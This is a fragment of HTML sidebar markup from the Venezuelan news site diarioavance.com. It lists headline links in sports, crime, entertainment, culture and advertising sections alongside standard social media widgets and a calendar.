</div><div class="widget posts"><div class="widget-title"><h2 style="background:#db1811;border-color:#db1811;">ENFOQUE DEPORTIVO</h2></div>
		<ul class="post-list">
																					
			<li itemscope="" itemtype="http://schema.org/Article">
								<figure class="post-thumbnail"><a itemprop="url" href="http://diarioavance.com/?p=164218" rel="bookmark">
				<img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2017/10/FOTO-PARA-EL-ENFOQUE-DEPORTIVO-3-170x113.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2017/10/FOTO-PARA-EL-ENFOQUE-DEPORTIVO-3-367x237.jpg" alt="Enfoque Deportivo">
				</a></figure>
								<h2 itemprop="name"><a itemprop="url" href="http://diarioavance.com/?p=164218" rel="bookmark">Enfoque Deportivo</a></h2>
								<div class="entry-meta">
									    				</div>
								<a href="http://diarioavance.com/?p=164218" class="read-more-link">Leer más...</a>
			</li>

											</ul>
</div><div class="widget posts"><div class="widget-title"><h2 style="background:#dd3333;border-color:#dd3333;color:#ffffff;">Casos</h2></div>
		<ul class="post-list">
																					
			<li itemscope="" itemtype="http://schema.org/Article">
								<figure class="post-thumbnail"><a itemprop="url" href="http://diarioavance.com/?p=165451" rel="bookmark">
				<img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/foto-1-170x113.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/foto-1-367x237.jpg" alt="Presos cuatro funcionarios del Saime por chanchullos con pasaportes">
				</a></figure>
								<h2 itemprop="name"><a itemprop="url" href="http://diarioavance.com/?p=165451" rel="bookmark">Presos cuatro funcionarios del Saime por chanchullos con pasaportes</a></h2>
								<div class="entry-meta">
									    				</div>
								<a href="http://diarioavance.com/?p=165451" class="read-more-link">Leer más...</a>
			</li>

			
			<li itemscope="" itemtype="http://schema.org/Article">
								<figure class="post-thumbnail"><a itemprop="url" href="http://diarioavance.com/?p=165299" rel="bookmark">
				<img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/en-este-local-170x113.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/en-este-local-367x237.jpg" alt="Sebin ataca chanchullos con el Carnét de la Patria">
				</a></figure>
								<h2 itemprop="name"><a itemprop="url" href="http://diarioavance.com/?p=165299" rel="bookmark">Sebin ataca chanchullos con el Carnét de la Patria</a></h2>
								<div class="entry-meta">
									    				</div>
								<a href="http://diarioavance.com/?p=165299" class="read-more-link">Leer más...</a>
			</li>

											</ul>
</div><div class="widget posts"><div class="widget-title"><h2 style="color:#ffffff;">Farándula</h2></div>
		<ul class="post-list">
																					
			<li itemscope="" itemtype="http://schema.org/Article">
								<figure class="post-thumbnail"><a itemprop="url" href="http://diarioavance.com/?p=165430" rel="bookmark">
				<img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/rauldemolina-170x113.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/rauldemolina-367x237.jpg" alt="Descubre la razón por la que Raúl de Molina se va de su casa">
				</a></figure>
								<h2 itemprop="name"><a itemprop="url" href="http://diarioavance.com/?p=165430" rel="bookmark">Descubre la razón por la que Raúl de Molina se va de su casa</a></h2>
								<div class="entry-meta">
									    				</div>
								<a href="http://diarioavance.com/?p=165430" class="read-more-link">Leer más...</a>
			</li>

			
			<li itemscope="" itemtype="http://schema.org/Article">
								<figure class="post-thumbnail"><a itemprop="url" href="http://diarioavance.com/?p=165450" rel="bookmark">
				<img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/3c63e8ca45e745708a9d4d1331fa55b9-170x113.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/3c63e8ca45e745708a9d4d1331fa55b9-367x237.jpg" alt="Ed Sheeran fue nombrado como el artista con más números de ventas">
				</a></figure>
								<h2 itemprop="name"><a itemprop="url" href="http://diarioavance.com/?p=165450" rel="bookmark">Ed Sheeran fue nombrado como el artista con más números de ventas</a></h2>
								<div class="entry-meta">
									    				</div>
								<a href="http://diarioavance.com/?p=165450" class="read-more-link">Leer más...</a>
			</li>

			
			<li itemscope="" itemtype="http://schema.org/Article">
								<figure class="post-thumbnail"><a itemprop="url" href="http://diarioavance.com/?p=165446" rel="bookmark">
				<img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/f4dd401e23f44dcfa2ce9c788f2c8615-170x113.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/f4dd401e23f44dcfa2ce9c788f2c8615-367x237.jpg" alt="Nacho publicó en Instagram un adelanto de su nuevo tema">
				</a></figure>
								<h2 itemprop="name"><a itemprop="url" href="http://diarioavance.com/?p=165446" rel="bookmark">Nacho publicó en Instagram un adelanto de su nuevo tema</a></h2>
								<div class="entry-meta">
									    				</div>
								<a href="http://diarioavance.com/?p=165446" class="read-more-link">Leer más...</a>
			</li>

			
			<li itemscope="" itemtype="http://schema.org/Article">
								<figure class="post-thumbnail"><a itemprop="url" href="http://diarioavance.com/?p=165427" rel="bookmark">
				<img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/jennifer-taylor-julia-170x113.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/jennifer-taylor-julia-367x237.jpg" alt="Esta sería la suma que algunas famosas tendrían que pagar para asegurar sus atributos">
				</a></figure>
								<h2 itemprop="name"><a itemprop="url" href="http://diarioavance.com/?p=165427" rel="bookmark">Esta sería la suma que algunas famosas tendrían que pagar para asegurar sus atributos</a></h2>
								<div class="entry-meta">
									    				</div>
								<a href="http://diarioavance.com/?p=165427" class="read-more-link">Leer más...</a>
			</li>

											</ul>
</div><div class="widget posts"><div class="widget-title"><h2>Cultura</h2></div>
		<ul class="post-list">
																					
			<li itemscope="" itemtype="http://schema.org/Article">
								<figure class="post-thumbnail"><a itemprop="url" href="http://diarioavance.com/?p=164259" rel="bookmark">
				<img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2017/11/4-351-1-170x113.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2017/11/4-351-1-367x237.jpg" alt="Dos cortometrajes venezolanos están nominados para el Festival de Cine de Mar del Plata">
				</a></figure>
								<h2 itemprop="name"><a itemprop="url" href="http://diarioavance.com/?p=164259" rel="bookmark">Dos cortometrajes venezolanos están nominados para el Festival de Cine de Mar del Plata</a></h2>
								<div class="entry-meta">
									    				</div>
								<a href="http://diarioavance.com/?p=164259" class="read-more-link">Leer más...</a>
			</li>

			
			<li itemscope="" itemtype="http://schema.org/Article">
								<figure class="post-thumbnail"><a itemprop="url" href="http://diarioavance.com/?p=164106" rel="bookmark">
				<img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2017/11/2-3-170x113.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2017/11/2-3-367x237.jpg" alt="Villa Teola celebra su  mes aniversario con teatro">
				</a></figure>
								<h2 itemprop="name"><a itemprop="url" href="http://diarioavance.com/?p=164106" rel="bookmark">Villa Teola celebra su  mes aniversario con teatro</a></h2>
								<div class="entry-meta">
									    				</div>
								<a href="http://diarioavance.com/?p=164106" class="read-more-link">Leer más...</a>
			</li>

			
			<li itemscope="" itemtype="http://schema.org/Article">
								<figure class="post-thumbnail"><a itemprop="url" href="http://diarioavance.com/?p=163946" rel="bookmark">
				<img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2017/11/LA-HISTORIA-DE-TOMASITA-JPG-170x113.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2017/11/LA-HISTORIA-DE-TOMASITA-JPG-367x237.jpg" alt="Con obra sobre el 27-F  cerró IV Festival de Teatro">
				</a></figure>
								<h2 itemprop="name"><a itemprop="url" href="http://diarioavance.com/?p=163946" rel="bookmark">Con obra sobre el 27-F  cerró IV Festival de Teatro</a></h2>
								<div class="entry-meta">
									    				</div>
								<a href="http://diarioavance.com/?p=163946" class="read-more-link">Leer más...</a>
			</li>

			
			<li itemscope="" itemtype="http://schema.org/Article">
								<figure class="post-thumbnail"><a itemprop="url" href="http://diarioavance.com/?p=163850" rel="bookmark">
				<img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2017/11/DSC_0273-170x113.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2017/11/DSC_0273-367x237.jpg" alt="Grandes y chicos gozaron un  montón en el Bulevar Bermúdez">
				</a></figure>
								<h2 itemprop="name"><a itemprop="url" href="http://diarioavance.com/?p=163850" rel="bookmark">Grandes y chicos gozaron un  montón en el Bulevar Bermúdez</a></h2>
								<div class="entry-meta">
									    				</div>
								<a href="http://diarioavance.com/?p=163850" class="read-more-link">Leer más...</a>
			</li>

											</ul>
</div><div class="widget widget_text"><div class="widget-title"><h2 style="background:#81d742;border-color:#81d742;">Perfiles</h2></div>			<div class="textwidget"><p><a>
<img src="http://diarioavance.com/wp-content/uploads/2017/03/jesús-maría-sánchez.png"  /></a></p>
<p align="center"><a><b>Con: Jesús María Sánchez</b></a></p></div>
		</div><div class="widget posts">
		<ul class="post-list">
																					
			<li itemscope="" itemtype="http://schema.org/Article">
								<figure class="post-thumbnail"><a itemprop="url" href="http://diarioavance.com/?p=161430" rel="bookmark">
				<img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2017/10/ASI-ERA-LA-CALLE-GUAICAIPURP-170x113.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2017/10/ASI-ERA-LA-CALLE-GUAICAIPURP-367x237.jpg" alt="Atractivas edificaciones tequeñas">
				</a></figure>
								<h2 itemprop="name"><a itemprop="url" href="http://diarioavance.com/?p=161430" rel="bookmark">Atractivas edificaciones tequeñas</a></h2>
								<div class="entry-meta">
									    				</div>
								<a href="http://diarioavance.com/?p=161430" class="read-more-link">Leer más...</a>
			</li>

			
			<li itemscope="" itemtype="http://schema.org/Article">
								<figure class="post-thumbnail"><a itemprop="url" href="http://diarioavance.com/?p=158330" rel="bookmark">
				<img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2017/09/cristóbal-rojas-170x113.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2017/09/cristóbal-rojas-367x237.jpg" alt="Se los llevó la tuberculosis">
				</a></figure>
								<h2 itemprop="name"><a itemprop="url" href="http://diarioavance.com/?p=158330" rel="bookmark">Se los llevó la tuberculosis</a></h2>
								<div class="entry-meta">
									    				</div>
								<a href="http://diarioavance.com/?p=158330" class="read-more-link">Leer más...</a>
			</li>

			
			<li itemscope="" itemtype="http://schema.org/Article">
								<figure class="post-thumbnail"><a itemprop="url" href="http://diarioavance.com/?p=157544" rel="bookmark">
				<img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2017/09/CASA-ARTURO-MICHELENA1-170x113.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2017/09/CASA-ARTURO-MICHELENA1-367x237.jpg" alt="Tejas holandesas en Los Teques">
				</a></figure>
								<h2 itemprop="name"><a itemprop="url" href="http://diarioavance.com/?p=157544" rel="bookmark">Tejas holandesas en Los Teques</a></h2>
								<div class="entry-meta">
									    				</div>
								<a href="http://diarioavance.com/?p=157544" class="read-more-link">Leer más...</a>
			</li>

			
			<li itemscope="" itemtype="http://schema.org/Article">
								<figure class="post-thumbnail"><a itemprop="url" href="http://diarioavance.com/?p=154485" rel="bookmark">
				<img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2017/08/720740-1274921-170x113.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2017/08/720740-1274921-367x237.jpg" alt="Espuelas amoladas">
				</a></figure>
								<h2 itemprop="name"><a itemprop="url" href="http://diarioavance.com/?p=154485" rel="bookmark">Espuelas amoladas</a></h2>
								<div class="entry-meta">
									    				</div>
								<a href="http://diarioavance.com/?p=154485" class="read-more-link">Leer más...</a>
			</li>

											</ul>
</div></aside><!--secondary sidebar-->
					</div>
					<aside class="sidebar" role="complementary" itemscope="itemscope" itemtype="http://schema.org/WPSideBar"><!--sidebar-->
    <div class="widget widget_search"><div class="widget-title"><h2>Buscador</h2></div><div class="search-box">
    <form role="search" method="get" class="search-form mom-search-form" action="http://diarioavance.com">
            <input type="search" class="search-field sf" value="Search" name="s" title="Search for:" onfocus="if(this.value=='Search')this.value='';" onblur="if(this.value=='')this.value='Search';">
    <button type="submit" class="search-submit" value="Search"></button>
        </form>
</div></div><div class="widget widget_text"><div class="widget-title"><h2 style="background:#dd9933;border-color:#dd9933;">SUSCRIBETE CON AVANCE</h2></div>			<div class="textwidget"><p><a href="http://diarioavance.com/category/impreso-2/impreso/"><br />
<img class="auto-style1 aligncenter" src="http://diarioavance.com/wp-content/uploads/2015/01/ban1.jpg" alt="" width="320" height="100" /></a></p>
</div>
		</div><div class="widget widget_apsc_widget"><div class="widget-title"><h2 style="background:#db1811;border-color:#db1811;">Nuestras  redes sociales</h2></div><div class="apsc-icons-wrapper clearfix apsc-theme-1" >
                <div class="apsc-each-profile">
                                        <a  class="apsc-facebook-icon clearfix" href="https://facebook.com/DiarioAvanceWeb" target="_blank" >
                            <div class="apsc-inner-block">
                                <span class="social-icon"><i class="fa fa-facebook apsc-facebook"></i><span class="media-name">Facebook</span></span>
                                <span class="apsc-count">16.7K</span><span class="apsc-media-type">Fans</span>
                            </div>
                        </a>
                                        </div>            <div class="apsc-each-profile">
                                        <a  class="apsc-twitter-icon clearfix"  href="https://twitter.com/diarioavanceweb" target="_blank"  >
                            <div class="apsc-inner-block">
                                <span class="social-icon"><i class="fa fa-twitter apsc-twitter"></i><span class="media-name">Twitter</span></span>
                                <span class="apsc-count">94.3K</span><span class="apsc-media-type">Followers</span>
                            </div>
                        </a>
                                </div>            <div class="apsc-each-profile">
                                            <a  class="apsc-instagram-icon clearfix" href="https://instagram.com/diarioavance" target="_blank"   >
                                <div class="apsc-inner-block">
                                    <span class="social-icon"><i class="apsc-instagram fa fa-instagram"></i><span class="media-name">Instagram</span></span>
                                    <span class="apsc-count">26.1K</span><span class="apsc-media-type">Followers</span>
                                </div>
                            </a>
                                        </div></div>

</div><div class="widget posts"><div class="widget-title"><h2 style="background:#dd9933;border-color:#dd9933;color:#ffffff;">PUBLICIDAD &#8211; MERCADEO</h2></div>
		<ul class="post-list">
																					
			<li itemscope="" itemtype="http://schema.org/Article">
								<figure class="post-thumbnail"><a itemprop="url" href="http://diarioavance.com/?p=163794" rel="bookmark">
				<img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2017/11/TrafficBustersGlasgowQuaysi-170x113.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2017/11/TrafficBustersGlasgowQuaysi-367x237.jpg" alt="McDonald’s utiliza los datos de tráfico para adaptar sus vallas publicitarias">
				</a></figure>
								<h2 itemprop="name"><a itemprop="url" href="http://diarioavance.com/?p=163794" rel="bookmark">McDonald’s utiliza los datos de tráfico para adaptar sus vallas publicitarias</a></h2>
								<div class="entry-meta">
									    				</div>
								<a href="http://diarioavance.com/?p=163794" class="read-more-link">Leer más...</a>
			</li>

			
			<li itemscope="" itemtype="http://schema.org/Article">
								<figure class="post-thumbnail"><a itemprop="url" href="http://diarioavance.com/?p=163784" rel="bookmark">
				<img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2017/11/very-170x113.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2017/11/very-367x237.jpg" alt="Este spot navideño le hará &#8220;aullar&#8221; de placer">
				</a></figure>
								<h2 itemprop="name"><a itemprop="url" href="http://diarioavance.com/?p=163784" rel="bookmark">Este spot navideño le hará &#8220;aullar&#8221; de placer</a></h2>
								<div class="entry-meta">
									    				</div>
								<a href="http://diarioavance.com/?p=163784" class="read-more-link">Leer más...</a>
			</li>

			
			<li itemscope="" itemtype="http://schema.org/Article">
								<figure class="post-thumbnail"><a itemprop="url" href="http://diarioavance.com/?p=163514" rel="bookmark">
				<img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2017/11/NAZ_441730350e54472b9c94f42dade10692-170x113.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2017/11/NAZ_441730350e54472b9c94f42dade10692-367x237.jpg" alt="Ogilvy es la nueva agencia de Toyota en Colombia">
				</a></figure>
								<h2 itemprop="name"><a itemprop="url" href="http://diarioavance.com/?p=163514" rel="bookmark">Ogilvy es la nueva agencia de Toyota en Colombia</a></h2>
								<div class="entry-meta">
									    				</div>
								<a href="http://diarioavance.com/?p=163514" class="read-more-link">Leer más...</a>
			</li>

			
			<li itemscope="" itemtype="http://schema.org/Article">
								<figure class="post-thumbnail"><a itemprop="url" href="http://diarioavance.com/?p=161969" rel="bookmark">
				<img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2017/10/medicos_sin_fronteras-170x113.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2017/10/medicos_sin_fronteras-367x237.jpg" alt="Médicos Sin Fronteras crean una campaña que nos hace replantearnos nuestra humanidad">
				</a></figure>
								<h2 itemprop="name"><a itemprop="url" href="http://diarioavance.com/?p=161969" rel="bookmark">Médicos Sin Fronteras crean una campaña que nos hace replantearnos nuestra humanidad</a></h2>
								<div class="entry-meta">
									    				</div>
								<a href="http://diarioavance.com/?p=161969" class="read-more-link">Leer más...</a>
			</li>

											</ul>
</div><div class="widget posts"><div class="widget-title"><h2 style="background:#deff3a;border-color:#deff3a;color:#000000;">Especiales</h2></div>
		<ul class="post-list">
																					
			<li itemscope="" itemtype="http://schema.org/Article">
								<figure class="post-thumbnail"><a itemprop="url" href="http://diarioavance.com/?p=165376" rel="bookmark">
				<img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/DSC0500-170x113.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/DSC0500-367x237.jpg" alt="El Taekwondo forma parte del  ADN de Francelina Curbelo">
				</a></figure>
								<h2 itemprop="name"><a itemprop="url" href="http://diarioavance.com/?p=165376" rel="bookmark">El Taekwondo forma parte del  ADN de Francelina Curbelo</a></h2>
								<div class="entry-meta">
									    				</div>
								<a href="http://diarioavance.com/?p=165376" class="read-more-link">Leer más...</a>
			</li>

			
			<li itemscope="" itemtype="http://schema.org/Article">
								<figure class="post-thumbnail"><a itemprop="url" href="http://diarioavance.com/?p=165147" rel="bookmark">
				<img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/DVWobg2XUAUxK6w-170x113.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/DVWobg2XUAUxK6w-367x237.jpg" alt="Bob Marley, considerado la principal figura de la música reggae">
				</a></figure>
								<h2 itemprop="name"><a itemprop="url" href="http://diarioavance.com/?p=165147" rel="bookmark">Bob Marley, considerado la principal figura de la música reggae</a></h2>
								<div class="entry-meta">
									    				</div>
								<a href="http://diarioavance.com/?p=165147" class="read-more-link">Leer más...</a>
			</li>

			
			<li itemscope="" itemtype="http://schema.org/Article">
								<figure class="post-thumbnail"><a itemprop="url" href="http://diarioavance.com/?p=165142" rel="bookmark">
				<img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/dia-contra-la-mutilacion-genital-femenina-170x113.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/dia-contra-la-mutilacion-genital-femenina-367x237.jpg" alt="Día internacional contra la mutilación genital femenina">
				</a></figure>
								<h2 itemprop="name"><a itemprop="url" href="http://diarioavance.com/?p=165142" rel="bookmark">Día internacional contra la mutilación genital femenina</a></h2>
								<div class="entry-meta">
									    				</div>
								<a href="http://diarioavance.com/?p=165142" class="read-more-link">Leer más...</a>
			</li>

			
			<li itemscope="" itemtype="http://schema.org/Article">
								<figure class="post-thumbnail"><a itemprop="url" href="http://diarioavance.com/?p=165043" rel="bookmark">
				<img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/Misa--170x113.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/Misa--367x237.jpg" alt="Lusitanos realizaron arraial en honor a la virgen de la Candelaria">
				</a></figure>
								<h2 itemprop="name"><a itemprop="url" href="http://diarioavance.com/?p=165043" rel="bookmark">Lusitanos realizaron arraial en honor a la virgen de la Candelaria</a></h2>
								<div class="entry-meta">
									    				</div>
								<a href="http://diarioavance.com/?p=165043" class="read-more-link">Leer más...</a>
			</li>

			
			<li itemscope="" itemtype="http://schema.org/Article">
								<figure class="post-thumbnail"><a itemprop="url" href="http://diarioavance.com/?p=164739" rel="bookmark">
				<img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/01/6f3d4a0c0efe4d62b82b91408857125c-170x113.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/01/6f3d4a0c0efe4d62b82b91408857125c-367x237.jpg" alt="El Galaxy S9 tendrá escaneo Inteligente">
				</a></figure>
								<h2 itemprop="name"><a itemprop="url" href="http://diarioavance.com/?p=164739" rel="bookmark">El Galaxy S9 tendrá escaneo Inteligente</a></h2>
								<div class="entry-meta">
									    				</div>
								<a href="http://diarioavance.com/?p=164739" class="read-more-link">Leer más...</a>
			</li>

			
			<li itemscope="" itemtype="http://schema.org/Article">
								<figure class="post-thumbnail"><a itemprop="url" href="http://diarioavance.com/?p=164601" rel="bookmark">
				<img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/01/Dunkin-Donuts-170x113.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/01/Dunkin-Donuts-367x237.jpg" alt="Dunkin Donuts anuncia otra gama de productos">
				</a></figure>
								<h2 itemprop="name"><a itemprop="url" href="http://diarioavance.com/?p=164601" rel="bookmark">Dunkin Donuts anuncia otra gama de productos</a></h2>
								<div class="entry-meta">
									    				</div>
								<a href="http://diarioavance.com/?p=164601" class="read-more-link">Leer más...</a>
			</li>

											</ul>
</div><div class="widget widget_text">			<div class="textwidget"><a class="twitter-timeline" href="https://twitter.com/DiarioAvanceWeb" data-widget-id="392111159672721408">Tweets por el @DiarioAvanceWeb.</a>
<script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0],p=/^http:/.test(d.location)?'http':'https';if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src=p+"://platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");</script></div>
		</div><div class="widget widget_text">			<div class="textwidget"><p><a href="http://diarioavance.com/denuncias/">
<img alt="" class="auto-style1" src="http://diarioavance.com/wp-content/uploads/2015/01/ban3.jpg"  /></a></p></div>
		</div><div class="widget widget_calendar"><div id="calendar_wrap" class="calendar_wrap"><table id="wp-calendar">
	<caption>abril 2018</caption>
	<thead>
	<tr>
		<th scope="col" title="lunes">L</th>
		<th scope="col" title="martes">M</th>
		<th scope="col" title="miércoles">X</th>
		<th scope="col" title="jueves">J</th>
		<th scope="col" title="viernes">V</th>
		<th scope="col" title="sábado">S</th>
		<th scope="col" title="domingo">D</th>
	</tr>
	</thead>

	<tfoot>
	<tr>
		<td colspan="3" id="prev"><a href="http://diarioavance.com/?m=201802">&laquo; Feb</a></td>
		<td class="pad">&nbsp;</td>
		<td colspan="3" id="next" class="pad">&nbsp;</td>
	</tr>
	</tfoot>

	<tbody>
	<tr>
		<td colspan="6" class="pad">&nbsp;</td><td id="today">1</td>
	</tr>
	<tr>
		<td>2</td><td>3</td><td>4</td><td>5</td><td>6</td><td>7</td><td>8</td>
	</tr>
	<tr>
		<td>9</td><td>10</td><td>11</td><td>12</td><td>13</td><td>14</td><td>15</td>
	</tr>
	<tr>
		<td>16</td><td>17</td><td>18</td><td>19</td><td>20</td><td>21</td><td>22</td>
	</tr>
	<tr>
		<td>23</td><td>24</td><td>25</td><td>26</td><td>27</td><td>28</td><td>29</td>
	</tr>
	<tr>
		<td>30</td>
		<td class="pad" colspan="6">&nbsp;</td>
	</tr>
	</tbody>
	</table></div></div><div class="widget widget_text"><div class="widget-title"><h2>Mercado Avance</h2></div>			<div class="textwidget"><a class="twitter-timeline" data-height="600" href="https://twitter.com/mercadoavance24">Tweets by mercadoavance24</a> <script async src="//platform.twitter.com/widgets.js" charset="utf-8"></script></div>
		</div><div class="widget Like-box"><div class="facebook-widget">
<iframe src="//www.facebook.com/plugins/likebox.php?href=http://www.facebook.com/diarioavanceweb&amp;width=335&amp;height=230&amp;colorscheme=light&amp;show_faces=true&amp;show_border=false&amp;stream=false&amp;header=true" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:335px; height:230px;" allowTransparency="true"></iframe>
</div>
</div><div class="widget widget_text"><div class="widget-title"><h2 style="background:#1e73be;border-color:#1e73be;color:#ffffff;">Instagram</h2></div>			<div class="textwidget"><div id="sb_instagram" class="sbi sbi_disable_mobile sbi_col_2" style="width:100%; padding-bottom: 10px; " data-id="491132456" data-num="4" data-res="auto" data-cols="2" data-options='{&quot;sortby&quot;: &quot;none&quot;, &quot;showbio&quot;: &quot;true&quot;, &quot;headercolor&quot;: &quot;&quot;, &quot;imagepadding&quot;: &quot;5&quot;}'>
<div class="sb_instagram_header" style="padding: 10px; padding-bottom: 0;"></div>
<div id="sbi_images" style="padding: 5px;">
<div class="sbi_loader fa-spin"></div>
</div>
<div id="sbi_load"><a class="sbi_load_btn" href="javascript:void(0);" style=""><span class="sbi_btn_text">Ver más&#8230;</span><i class="fa fa-spinner fa-pulse" aria-hidden="true" style="display:none;"></i></a></p>
<div class="sbi_follow_btn"><a href="https://instagram.com/" style="" target="_blank"><i class="fa fa-instagram"></i>Síguenos en Instagram</a></div>
</div>
</div>
<p><script type="text/javascript">var sb_instagram_js_options = {"sb_instagram_at":"491132456.1677ed0.d6f742c748fc4e928c4f7019c3cf869a"};</script><script type='text/javascript' src='http://diarioavance.com/wp-content/plugins/instagram-feed/js/sb-instagram.min.js?ver=1.6'></script></p>
</div>
		</div><div class="widget widget_text">			<div class="textwidget"><p><a href="http://diarioavance.com/publicidad/"><br />
<img class="auto-style1" src="http://diarioavance.com/wp-content/uploads/2015/04/Directorio-Bomberosw.jpg" alt="" width="300" height="700" /></a></p>
</div>
		</div><div class="widget posts"><div class="widget-title"><h2 style="background:#81d742;border-color:#81d742;">Deportes Nacionales</h2></div>
		<ul class="post-list">
																					
			<li itemscope="" itemtype="http://schema.org/Article">
								<figure class="post-thumbnail"><a itemprop="url" href="http://diarioavance.com/?p=165188" rel="bookmark">
				<img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/copa-d.jpg_1609701233-170x113.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/copa-d.jpg_1609701233-367x237.jpg" alt="Venezuela se las verá con Uruguay en semifinales de la Copa Davis">
				</a></figure>
								<h2 itemprop="name"><a itemprop="url" href="http://diarioavance.com/?p=165188" rel="bookmark">Venezuela se las verá con Uruguay en semifinales de la Copa Davis</a></h2>
								<div class="entry-meta">
									    				</div>
								<a href="http://diarioavance.com/?p=165188" class="read-more-link">Leer más...</a>
			</li>

			
			<li itemscope="" itemtype="http://schema.org/Article">
								<figure class="post-thumbnail"><a itemprop="url" href="http://diarioavance.com/?p=165092" rel="bookmark">
				<img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/151787517395991176-170x113.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/151787517395991176-367x237.jpg" alt="Puerto Rico vapuleó a Venezuela para alcanzar la clasificación">
				</a></figure>
								<h2 itemprop="name"><a itemprop="url" href="http://diarioavance.com/?p=165092" rel="bookmark">Puerto Rico vapuleó a Venezuela para alcanzar la clasificación</a></h2>
								<div class="entry-meta">
									    				</div>
								<a href="http://diarioavance.com/?p=165092" class="read-more-link">Leer más...</a>
			</li>

			
			<li itemscope="" itemtype="http://schema.org/Article">
								<figure class="post-thumbnail"><a itemprop="url" href="http://diarioavance.com/?p=164978" rel="bookmark">
				<img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/Nestor-Molina-02-gde-170x113.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/Nestor-Molina-02-gde-367x237.jpg" alt="Molina y Valdez cara a cara en el tercero de la Serie del Caribe">
				</a></figure>
								<h2 itemprop="name"><a itemprop="url" href="http://diarioavance.com/?p=164978" rel="bookmark">Molina y Valdez cara a cara en el tercero de la Serie del Caribe</a></h2>
								<div class="entry-meta">
									    				</div>
								<a href="http://diarioavance.com/?p=164978" class="read-more-link">Leer más...</a>
			</li>

			
			<li itemscope="" itemtype="http://schema.org/Article">
								<figure class="post-thumbnail"><a itemprop="url" href="http://diarioavance.com/?p=164935" rel="bookmark">
				<img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/15177004391042186148-170x113.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/15177004391042186148-367x237.jpg" alt="Venezuela bombardeó a República Dominicana">
				</a></figure>
								<h2 itemprop="name"><a itemprop="url" href="http://diarioavance.com/?p=164935" rel="bookmark">Venezuela bombardeó a República Dominicana</a></h2>
								<div class="entry-meta">
									    				</div>
								<a href="http://diarioavance.com/?p=164935" class="read-more-link">Leer más...</a>
			</li>

											</ul>
</div><div class="widget slider"><div class="widget-title"><h2 style="background:#81d742;border-color:#81d742;">Deportes Internacionales</h2></div>
<div class="slider-widget">
    <script>
            //widget slider
	  jQuery(document).ready(function($) {
					var rtl = false;
						$('.wmcs-10').owlCarousel({
		animateOut: 'fadeOut',
		animateIn: '',
		autoplay:true,
				autoplayTimeout:5000,
				autoplayHoverPause:false,
		rtl: rtl,
		items:1,
		nav: true,
		 navText: ['<span class="enotype-icon-arrow-left7"></span>',
			'<span class="enotype-icon-uniE6D8"></span>'
		],
		smartSpeed:1000,
	});
      });
    </script>
    
    <div class="slider-widget-wrap momizat-custom-slider wmcs-10">
   		 															        <div class="slider-widget-item" itemscope="" itemtype="http://schema.org/Article">
            <figure class="post-thumbnail">
                <a itemprop="url" href="http://diarioavance.com/?p=165416" rel="bookmark">
